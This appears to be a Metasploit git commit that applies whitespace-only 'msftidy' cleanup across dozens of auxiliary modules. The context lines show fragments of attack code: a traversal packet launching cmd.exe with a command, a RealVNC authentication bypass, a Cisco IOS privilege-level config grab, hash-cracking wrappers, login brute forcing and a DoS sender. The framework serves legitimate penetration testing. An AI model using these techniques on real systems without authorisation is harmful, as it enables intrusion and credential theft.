msftidy on aux modules, see #5749

unstable
James Lee 2011-11-20 13:12:07 +11:00
parent f35b6c5269
commit 67120d4263
78 changed files with 249 additions and 249 deletions


@ -56,13 +56,13 @@ class Metasploit3 < Msf::Auxiliary
if (res and res.code == 500)
print_status("Request appears successful on #{rhost}:#{rport}! Response: #{res.code}")
file = send_request_raw(
{
'method' => 'GET',
'uri' => '/' + tmpfile,
}, 25)
if (file and file.code == 200)
print_status("Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\r\n#{Rex::Text.decode_base64(file.body)}")
elsif (file and file.code)


@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Exploited successfully")
else
print_status("Exploit failed.")
end
end
else
print_error("Target appears not vulnerable!")
end


@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
}, 25)
if (res and res.code == 200)
print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n#{res.body}")
@files_found << files
@files_found << files
break
elsif (res and res.code)
print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}")


@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
}, 25)
if (res and res.code == 200)
print_status("Request may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n#{res.body}")
@files_found << files
@files_found << files
elsif (res and res.code)
print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}")
end


@ -710,7 +710,7 @@ class Metasploit3 < Msf::Auxiliary
'xp_IsNTAdmin',
'xp_mapdown_bitmap'
]
query = <<-EOS
SELECT CAST(SYSOBJECTS.NAME AS CHAR) FROM SYSOBJECTS, SYSPROTECTS WHERE SYSPROTECTS.UID = 0 AND XTYPE IN ('X','P')
AND SYSOBJECTS.ID = SYSPROTECTS.ID


@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
packet << "windows\\system32\\cmd.exe\" /c #{exec}"
packet << "\x00" * (143 + exec.length)
print_status("Sending command: #{exec}")
sock.put(packet)
sock.get_once(-1,0.5)


@ -56,11 +56,11 @@ class Metasploit3 < Msf::Auxiliary
end
def run_host(ip)
if (datastore['VERBOSE'])
print_status("Connecting to the server...")
end
begin
connect()
smb_login()
@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
if (datastore['VERBOSE'])
print_status("Checking for file/folder #{datastore['RPATH']}...")
end
if (fd = simple.open("\\#{datastore['RPATH']}", 'o')) # mode is open only - do not create/append/write etc
print_good("File FOUND: \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['RPATH']}")
fd.close


@ -14,7 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'RealVNC NULL Authentication Mode Bypass',
@ -66,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("The vncviewer does not appear to be installed, exiting...")
return nil
end
print_status("Spawning viewer thread...")
print_status("Spawning viewer thread...")
view = framework.threads.spawn("VncViewerWrapper", false) {
system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
}
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
# Establishes the connection between the viewier and the remote server
client = listener.accept
add_socket(client)
# Closes the listener socket as it is no longer needed
listener.close
@ -91,9 +91,9 @@ class Metasploit3 < Msf::Auxiliary
client.puts(serverhello)
clienthello = client.get_once
s.puts(clienthello)
authmethods = s.read(2)
print_status("Auth methods received. Sending null authentication option to client")
client.write("\x01\x01")
client.read(1)
@ -121,11 +121,11 @@ class Metasploit3 < Msf::Auxiliary
s.put(data)
end
rescue
print_error("Client closed connection")
print_error("Client closed connection")
closed = true
end
end
if selected[0].include?(s)
begin
data = s.get_once


@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
sock.put(runtime)
res = sock.get_once()
methodid = res[5,4]
exec = [0x00].pack('n') + [21 + cmd.length].pack('n') + methodid
exec << [0x04000000].pack('V') + "exec" + [0x01000000].pack('V')
exec << "\x04" + [0x00].pack('n') + [cmd.length].pack('n') + cmd


@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
def run
wordlist = Rex::Quickfile.new("jtrtmp")
hashlist = Rex::Quickfile.new("jtrtmp")
begin
# Seed the wordlist with usernames, passwords, and hostnames
seed = []
@ -47,42 +47,42 @@ class Metasploit3 < Msf::Auxiliary
seed << john_expand_word( o.user ) if o.user
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
end
# Grab any known passwords out of the john.pot file
john_cracked_passwords.values {|v| seed << v }
# Write the seed file
wordlist.write( seed.flatten.uniq.join("\n") + "\n" )
print_status("Seeded the password database with #{seed.length} words...")
# Append the standard JtR wordlist as well
::File.open(john_wordlist_path, "rb") do |fd|
wordlist.write fd.read(fd.stat.size)
end
# Close the wordlist to prevent sharing violations (windows)
# Close the wordlist to prevent sharing violations (windows)
wordlist.close
# Create a PWDUMP style input file for SMB Hashes
smb_hashes = myworkspace.creds.select{|x| x.ptype == "smb_hash" }
smb_hashes.each do |cred|
hashlist.write( "cred_#{cred[:id]}:#{cred[:id]}:#{cred[:pass]}:::\n" )
end
hashlist.close
if smb_hashes.length > 0
cracked_ntlm = {}
cracked_lm = {}
added = []
# Crack this in LANMAN format using wordlist mode with tweaked rules
john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'lm')
# Crack this in LANMAN format using various incremntal modes
john_crack(hashlist.path, :incremental => "All4", :format => 'lm')
john_crack(hashlist.path, :incremental => "Digits5", :format => 'lm')
# Parse cracked passwords and permute LANMAN->NTLM as needed
cracked = john_show_passwords(hashlist.path, 'lm')
cracked[:users].each_pair do |k,v|
@ -90,52 +90,52 @@ class Metasploit3 < Msf::Auxiliary
next if (v[0,7] == "???????" or v[7,7] == "???????")
next if not k =~ /^cred_(\d+)/m
cid = $1.to_i
cracked_lm[k] = v
cred_find = smb_hashes.select{|x| x[:id] == cid}
next if cred_find.length == 0
cred = cred_find.first
ntlm = cred.pass.split(":", 2).last
done = john_lm_upper_to_ntlm(v, ntlm)
cracked_ntlm[k] = done if done
end
# Append any cracked values to the wordlist
tfd = ::File.open(wordlist.path, "ab")
cracked_lm.values.each {|w| if not added.include?(w); tfd.write( w + "\n" ); added << w; end }
cracked_ntlm.values.each {|w| if not added.include?(w); tfd.write( w + "\n" ); added << w; end }
tfd.close
# Crack this in NTLM format
john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'nt')
# Crack this in NTLM format using various incremntal modes
john_crack(hashlist.path, :incremental => "All4", :format => 'nt')
john_crack(hashlist.path, :incremental => "Digits5", :format => 'nt')
# Parse cracked passwords
cracked = john_show_passwords(hashlist.path, 'nt')
cracked[:users].each_pair do |k,v|
next if cracked_ntlm[k]
cracked_ntlm[k] = v
cracked_ntlm[k] = v
end
# Append any cracked values to the wordlist
tfd = ::File.open(wordlist.path, "ab")
cracked_ntlm.values.each {|w| if not added.include?(w); tfd.write( w + "\n" ); added << w; end }
tfd.close
# Store the cracked results based on user_id => cred.id
cracked_ntlm.each_pair do |k,v|
next if not k =~ /^cred_(\d+)/m
cid = $1.to_i
cred_find = smb_hashes.select{|x| x[:id] == cid}
next if cred_find.length == 0
cred = cred_find.first
print_good("Cracked: #{cred.user}:#{v} (#{cred.service.host.address}:#{cred.service.port})")
report_auth_info(
:host => cred.service.host,
@ -148,9 +148,9 @@ class Metasploit3 < Msf::Auxiliary
)
end
end
# XXX: Enter other hash types here (shadow, etc)
rescue ::Timeout::Error
ensure
wordlist.close rescue nil


@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
] ,
'License' => MSF_LICENSE # JtR itself is GPLv2, but this wrapper is MSF (BSD)
)
register_options(
[
OptBool.new('Crypt',[false, 'Try crypt() format hashes(Very Slow)', false])
@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary
# Seed the wordlist with usernames, passwords, and hostnames
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
myworkspace.creds.each do |o|
myworkspace.creds.each do |o|
seed << john_expand_word( o.user ) if o.user
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
end


@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
def run
@wordlist = Rex::Quickfile.new("jtrtmp")
@wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
@wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
@wordlist.close
print_status("Cracking MSSQL Hashes")
crack("mssql")
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
# Seed the wordlist with usernames, passwords, and hostnames
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
myworkspace.creds.each do |o|
myworkspace.creds.each do |o|
seed << john_expand_word( o.user ) if o.user
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
end
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
def crack(format)
hashlist = Rex::Quickfile.new("jtrtmp")
ltype= "#{format}.hashes"
myloots = myworkspace.loots.find(:all, :conditions => ['ltype=?', ltype])
@ -118,8 +118,8 @@ class Metasploit3 < Msf::Auxiliary
cracked = john_show_passwords(hashlist.path, format)
print_status("#{cracked[:cracked]} hashes were cracked!")
cracked[:users].each_pair do |k,v|
print_status("#{cracked[:cracked]} hashes were cracked!")
cracked[:users].each_pair do |k,v|
print_good("Host: #{v[1]} Port: #{v[2]} User: #{k} Pass: #{v[0]}")
report_auth_info(
:host => v[1],


@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
def run
wordlist = Rex::Quickfile.new("jtrtmp")
wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
wordlist.close
hashlist = Rex::Quickfile.new("jtrtmp")
@ -69,11 +69,11 @@ class Metasploit3 < Msf::Auxiliary
cracked = john_show_passwords(hashlist.path, 'mysql-fast')
print_status("#{cracked[:cracked]} hashes were cracked!")
print_status("#{cracked[:cracked]} hashes were cracked!")
#Save cracked creds and add the passwords back to the wordlist for the next round
tfd = ::File.open(wordlist.path, "ab")
cracked[:users].each_pair do |k,v|
cracked[:users].each_pair do |k,v|
print_good("Host: #{v[1]} Port: #{v[2]} User: #{k} Pass: #{v[0]}")
tfd.write( v[0] + "\n" )
report_auth_info(
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
:sname => 'mssql',
:user => k,
:pass => v[0]
)
)
end
print_status("Trying 'mysql-sha1' Wordlist: #{wordlist.path}")
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary
# Seed the wordlist with usernames, passwords, and hostnames
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
myworkspace.creds.each do |o|
myworkspace.creds.each do |o|
seed << john_expand_word( o.user ) if o.user
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
end
@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary
john.each_line{|line| seed << line.chomp}
return seed
end
# huh?


@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
def run
@wordlist = Rex::Quickfile.new("jtrtmp")
@wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
@wordlist.write( build_seed().flatten.uniq.join("\n") + "\n" )
@wordlist.close
crack("oracle")
crack("oracle11g")
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
myworkspace.creds.each do |o|
myworkspace.creds.each do |o|
seed << john_expand_word( o.user ) if o.user
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
end
@ -84,8 +84,8 @@ class Metasploit3 < Msf::Auxiliary
return seed
end
def crack(format)
hashlist = Rex::Quickfile.new("jtrtmp")
@ -116,8 +116,8 @@ class Metasploit3 < Msf::Auxiliary
cracked = john_show_passwords(hashlist.path, format)
print_status("#{cracked[:cracked]} hashes were cracked!")
cracked[:users].each_pair do |k,v|
print_status("#{cracked[:cracked]} hashes were cracked!")
cracked[:users].each_pair do |k,v|
print_good("Host: #{v[1]} Port: #{v[2]} User: #{k} Pass: #{v[0]}")
report_auth_info(
:host => v[1],


@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
'License' => MSF_LICENSE
)
register_options(
[
OptPath.new('passwd', [true, 'The path to the passwd file']),
@ -48,4 +48,4 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
end


@ -25,14 +25,14 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$',
'Description' => %Q{
This module attempts to crack Postgres SQL md5 password hashes.
It creates hashes based on information saved in the MSF Database
It creates hashes based on information saved in the MSF Database
such as hostnames, usernames, passwords, and database schema information.
The user can also supply an additional external wordlist if they wish.
},
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
'License' => MSF_LICENSE
)
register_options(
[
OptPath.new('Wordlist', [false, 'The path to an optional Wordlist']),
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
myloots.each do |myloot|
begin
postgres_array = CSV.read(myloot.path).drop(1)
rescue
rescue
print_error("Unable to process #{myloot.path}")
end
postgres_array.each do |row|
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
:user => row[0],
:pass => password
)
end
end
end
@ -115,7 +115,7 @@ class Metasploit3 < Msf::Auxiliary
# Seed the wordlist with usernames, passwords, and hostnames
myworkspace.hosts.find(:all).each {|o| seed << john_expand_word( o.name ) if o.name }
myworkspace.creds.each do |o|
myworkspace.creds.each do |o|
seed << john_expand_word( o.user ) if o.user
seed << john_expand_word( o.pass ) if (o.pass and o.ptype !~ /hash/)
end
@ -139,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary
if datastore['Munge']
mungedseed=[]
seed.each do |word|
munged = word.gsub(/[sS]/, "$").gsub(/[aA]/,"@").gsub(/[oO]/,"0")
munged = word.gsub(/[sS]/, "$").gsub(/[aA]/,"@").gsub(/[oO]/,"0")
mungedseed << munged
munged.gsub!(/[eE]/, "3")
munged.gsub!(/[tT]/, "7")


@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
sock.put(sploit + "\r\n\r\n")
disconnect
print_status("DoS packet unsuccessful.")
rescue ::Rex::ConnectionRefused
print_status("Unable to connect to #{rhost}:#{rport}.")


@ -51,13 +51,13 @@ class Metasploit3 < Msf::Auxiliary
print_error("FORMAT string length cannot exceed 125 bytes.")
return
end
fmt = datastore['FORMAT'] + "XX" # XX is 2 bytes used to mark end of memory garbage for regexp
begin
res = send_request_raw({
'uri' => datastore['URI'] + fmt,
})
if res.code == 200
res.body.scan(/\<td class\=\"loginError\"\>(.+)XX/ism)
print_status("Information leaked: #{$1}")


@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
def run
open_pcap
p = PacketFu::TCPPacket.new
p.ip_daddr = rhost
p.ip_saddr = shost


@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary
# counts
pkt << [1,0,0,0].pack('n*')
if str[0,1] == "."
pkt << [str.length].pack('C')
end


@ -68,21 +68,21 @@ class Metasploit3 < Msf::Auxiliary
if datastore['SSL']
proto = "https://"
end
useragent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
if datastore['UserAgent'] != nil
if datastore['UserAgent'].length > 0
useragent = datastore['UserAgent']
end
end
host = datastore['RHOST']
if datastore['VHOST']
if datastore['VHOST'].length > 0
host = datastore['VHOST']
end
end
@send_data = {
:uri => '',
:version => '1.1',
@ -515,7 +515,7 @@ class Metasploit3 < Msf::Auxiliary
set_cookie(cookie)
print_status("Set cookie:#{cookie}")
print_status("Grabbing webpage #{datastore['URL']} from #{datastore['RHOST']} using cookies")
response = send_request_raw(
{
'uri' => datastore['URL'],


@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
shost = datastore['SHOST']
shost ||= get_ipv4_addr(@interface) if @netifaces
raise RuntimeError ,'SHOST should be defined' unless shost
smac = datastore['SMAC']
smac ||= get_mac(@interface) if @netifaces
raise RuntimeError ,'SMAC should be defined' unless smac


@ -65,10 +65,10 @@ class Metasploit3 < Msf::Auxiliary
# Send ping
print_status("Sending multicast pings...")
dmac = "33:33:00:00:00:01"
# Figure out our source address by the link-local interface
shost = ipv6_link_address
ping6("FF01::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
ping6("FF01::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})
ping6("FF02::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false})


@ -109,7 +109,7 @@ class Metasploit3 < Msf::Auxiliary
def neighbor_discovery(neighs)
print_status("Discovering IPv6 addresses for IPv4 nodes...")
print_status("")
smac = datastore['SMAC']
open_pcap({'SNAPLEN' => 68, 'FILTER' => "icmp6"})


@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary
p.ipv6_next = 0x3a
p.ipv6_saddr = shost
p.ipv6_daddr = dhost
payload = router_advertisement_payload
payload << opt60_payload(lifetime, prefix)
payload << slla_payload(smac)


@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary
hname = nil
case pkt[2]
when 53
app = 'DNS'
ver = nil
@ -146,7 +146,7 @@ class Metasploit3 < Msf::Auxiliary
ver = pkt[0].unpack('H*')[0] if not ver
inf = ver if ver
when 137
app = 'NetBIOS'
@ -219,7 +219,7 @@ class Metasploit3 < Msf::Auxiliary
ver = 'NTP v4 (unsynchronized)' if (ver =~ /^e40/)
ver = 'Microsoft NTP' if (ver =~ /^dc00|^dc0f/)
inf = ver if ver
when 1434
app = 'MSSQL'
mssql_ping_parse(pkt[0]).each_pair { |k,v|
@ -231,7 +231,7 @@ class Metasploit3 < Msf::Auxiliary
asn = OpenSSL::ASN1.decode(pkt[0]) rescue nil
return if not asn
snmp_error = asn.value[0].value rescue nil
snmp_comm = asn.value[1].value rescue nil
snmp_data = asn.value[2].value[3].value[0] rescue nil
@ -242,7 +242,7 @@ class Metasploit3 < Msf::Auxiliary
snmp_info = snmp_info.to_s.gsub(/\s+/, ' ')
inf = snmp_info
com = snmp_comm
com = snmp_comm
when 5093
app = 'Sentinel'


@ -160,7 +160,7 @@ class Metasploit3 < Msf::Auxiliary
hname = nil
case pkt[2]
when 53
app = 'DNS'
ver = nil
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
ver = pkt[0].unpack('H*')[0] if not ver
inf = ver if ver
when 137
app = 'NetBIOS'
@ -248,7 +248,7 @@ class Metasploit3 < Msf::Auxiliary
ver = 'NTP v4 (unsynchronized)' if (ver =~ /^e40/)
ver = 'Microsoft NTP' if (ver =~ /^dc00|^dc0f/)
inf = ver if ver
when 1434
app = 'MSSQL'
mssql_ping_parse(pkt[0]).each_pair { |k,v|
@ -259,7 +259,7 @@ class Metasploit3 < Msf::Auxiliary
app = 'SNMP'
asn = OpenSSL::ASN1.decode(pkt[0]) rescue nil
return if not asn
snmp_error = asn.value[0].value rescue nil
snmp_comm = asn.value[1].value rescue nil
snmp_data = asn.value[2].value[3].value[0] rescue nil
@ -270,13 +270,13 @@ class Metasploit3 < Msf::Auxiliary
snmp_info = snmp_info.to_s.gsub(/\s+/, ' ')
inf = snmp_info
com = snmp_comm
com = snmp_comm
when 5093
app = 'Sentinel'
when 523
app = 'ibm-db2'
inf = db2disco_parse(pkt[0])


@ -83,13 +83,13 @@ class Metasploit3 < Msf::Auxiliary
'Content-Type' => 'application/x-amf',
'data' => postrequest
}, 25)
if (res.nil?)
print_error("no response for #{ip}:#{rport} #{check}")
elsif (res.code == 200 and res.body =~ /\<\?xml version\="1.0" encoding="utf-8"\?\>/)
print_status("#{rhost}:#{rport} #{check} #{res.code}\n #{res.body}")
elsif (res and res.code == 302 or res.code == 301)
print_status(" Received 302 to #{res.headers['Location']} for #{check}")
print_status(" Received 302 to #{res.headers['Location']} for #{check}")
else
print_error("#{res.code} for #{check}")
#''


@ -15,13 +15,13 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::HttpClient
# Include Cisco utility methods
include Msf::Auxiliary::Cisco
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
'Description' => %q{
This module gathers data from a Cisco device (router or switch) with the device manager
web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify
authentication.
authentication.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run_host(ip)
res = send_request_cgi({
'uri' => "/exec/show/version/CR",
'method' => 'GET'
@ -61,11 +61,11 @@ class Metasploit3 < Msf::Auxiliary
print_error("#{rhost}:#{rport} Unexpected response code from this device #{res.code}")
return
end
if res and res.body and res.body =~ /Cisco (Internetwork Operating System|IOS) Software/
print_good("#{rhost}:#{rport} Successfully authenticated to this device")
# Report a vulnerability only if no password was specified
# Report a vulnerability only if no password was specified
if datastore['BasicAuthPass'].to_s.length == 0
report_vuln(
@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
)
end
res = send_request_cgi({
'uri' => "/exec/show/config/CR",
'method' => 'GET'
@ -94,9 +94,9 @@ class Metasploit3 < Msf::Auxiliary
else
print_error("#{rhost}:#{rport} Error: could not retrieve the IOS configuration")
end
end
end
end


@ -15,13 +15,13 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::HttpClient
# Include Cisco utility methods
include Msf::Auxiliary::Cisco
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
@ -49,13 +49,13 @@ class Metasploit3 < Msf::Auxiliary
end
def run_host(ip)
16.upto(99) do |level|
res = send_request_cgi({
'uri' => "/level/#{level}/exec/show/version/CR",
'method' => 'GET'
}, 20)
if res and res.body and res.body =~ /Cisco Internetwork Operating System Software/
print_good("#{rhost}:#{rport} Found vulnerable privilege level: #{level}")
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
'uri' => "/level/#{level}/exec/show/config/CR",
'method' => 'GET'
}, 20)
if res and res.body and res.body =~ /<FORM METHOD([^\>]+)\>(.*)<\/FORM>/mi
config = $2.strip
print_good("#{rhost}:#{rport} Processing the configuration file...")
@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary
else
print_error("#{rhost}:#{rport} Error: could not retrieve the IOS configuration")
end
break
end
end


@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
out = (v =~ /^6/) ? "Adobe ColdFusion MX6 #{v}" : "Adobe ColdFusion MX7 #{v}"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2006 Adobe/)
out = "Adobe ColdFusion 8"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2009 Adobe Systems\, Inc\. All rights reserved/)
out = "Adobe ColdFusion 9"
elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)


@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
'~',
''
]
conn = false
tpath = datastore['PATH']
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
dm = datastore['NoDetailMessages']
extensions << datastore['EXT']
@ -104,7 +104,7 @@ class Metasploit3 < Msf::Auxiliary
File.open(datastore['DICTIONARY'], 'rb').each do |testf|
queue << testf.strip
end
#
# Detect error code
#


@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('USERNAME',[true, 'A specific username to authenticate as','admin']),
], self.class)
end
#
# Return GlassFish's edition (Open Source or Commercial) and version (2.x, 3.0, 3.1, 9.x) and
# banner (ex: Sun Java System Application Server 9.x)
@ -224,7 +224,7 @@ class Metasploit3 < Msf::Auxiliary
edition, version, banner = get_version(res)
target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{datastore['PATH'].to_s}"
print_status("#{target_url} - GlassFish - Attempting authentication")
if (version == '2.x' or version == '9.x' or version == '3.0')
try_glassfish_auth_bypass(version)
end


@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
end
def find_auth_uri_and_scheme
path_and_scheme = []
if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0
paths = [datastore['AUTH_URI']]
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary
/Management.asp
}
end
paths.each do |path|
res = send_request_cgi({
'uri' => path,
@ -112,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run_host(ip)
if ( datastore['REQUESTTYPE'] == "PUT" ) and (datastore['AUTH_URI'] == "")
print_error("You need need to set AUTH_URI when using PUT Method !")
return
@ -142,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
success = false
proof = ""
ret = do_http_login(user,pass,@scheme)
return :abort if ret == :abort
if ret == :success
@ -264,7 +264,7 @@ class Metasploit3 < Msf::Auxiliary
return :fail
end
def do_http_auth_digest(user,pass,requesttype)
path = datastore['AUTH_URI'] || "/"
begin
@ -284,14 +284,14 @@ class Metasploit3 < Msf::Auxiliary
#'DigestAuthIIS' => false,
'DigestAuthUser' => user,
'DigestAuthPassword' => pass
}, 25)
}, 25)
end
unless (res.kind_of? Rex::Proto::Http::Response)
vprint_error("#{target_url} not responding")
return :abort
end
return :abort if (res.code == 404)
if (res.code == 200) or (res.code == 201)


@ -135,7 +135,7 @@ class Metasploit4 < Msf::Auxiliary
path << "#{Rex::Text.rand_text_alpha(5)}.txt"
vprint_status("No filename specified. Using: #{path}")
end
#Upload file
res = do_put(path, data)
vprint_status("Reply: #{res.code.to_s}")


@ -55,11 +55,11 @@ class Metasploit3 < Msf::Auxiliary
end
return results
end
def translate(ip)
ip.split('.')
end
def run_host(ip)
result = resolve(ip)
if result != 0
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
elsif threatnum > 75 then
threat = "over 1 million"
end
typenum = breakup[3]
typestring = case typenum
when '0' then 'Search Engine'
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
else
"Unknown"
end
print_status ""
print_status "#{ip} resloves to #{result} which means: #{typestring}"
print_status "=> it was last seen #{lastseen} day ago and has a threat score of #{threatnum} or \'#{threat} spam messages\'"


@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
'ctype' => 'text/plain',
}, 20)
if res
info = http_fingerprint({ :response => res })
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
if(res.body and />(JBoss[^<]+)/.match(res.body) )
print_error("#{rhost}:#{rport} JBoss error message: #{$1}")
end
apps = [ '/jmx-console/HtmlAdaptor',
'/status',
'/web-console/ServerInfo.jsp',
@ -66,12 +66,12 @@ class Metasploit3 < Msf::Auxiliary
'/web-console/Invoker',
'/invoker/JMXInvokerServlet'
]
print_status("#{rhost}:#{rport} Checking http...")
apps.each do |app|
check_app(app)
end
ports = {
# 1098i, 1099, and 4444 needed to use twiddle
1098 => 'Naming Service',


@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
module will attempt to download the Majordomo config.pl file.
},
'Author' => ['Nikolas Sotiriu'],
'Version' => '$Revision$',
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '70762'],
@ -87,10 +87,10 @@ class Metasploit3 < Msf::Auxiliary
else
file_data = html.gsub(%r{(.*)<pre>|<\/pre>(.*)}m, '')
print_good("#{rhost}:#{rport} Successfully retrieved #{file} and storing as loot...")
# Transform HTML entities back to the original characters
file_data = file_data.gsub(/\&gt\;/i, '>').gsub(/\&lt\;/i, '<').gsub(/\&quot\;/i, '"')
store_loot("majordomo2.traversal.file", "application/octet-stream", rhost, file_data, file)
return
end


@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
OptInt.new('RPORT', [ true, "The target port", 443]),
OptString.new('VERSION', [ true, "OWA VERSION (2003, 2007, or 2010)", '2007'])
], self.class)
register_advanced_options(
[
OptString.new('AD_DOMAIN', [ false, "Optional AD domain to prepend to usernames", '']),


@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
end
begin
res = send_request_raw({
'uri' => tpath,


@ -13,7 +13,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::HttpClient


@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("There was an error reading the MySQL User Table")
return
end
this_service = report_service(
:host => datastore['RHOST'],
:port => datastore['RPORT'],
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
next if row[0]== "test"
mysql_schema[row[0]]= get_tbl_names(row[0])
end
end
end
report_other_data(mysql_schema)
end


@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", false]),
], self.class)
end
def verbose; datastore['VERBOSE']; end
@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
elsif (version == 10)
postrequest = "username=#{user}&password=#{pass}&connectID=#{sid}&report=&script=&dynamic=&type=&action=&variables=&event=login"
end
begin
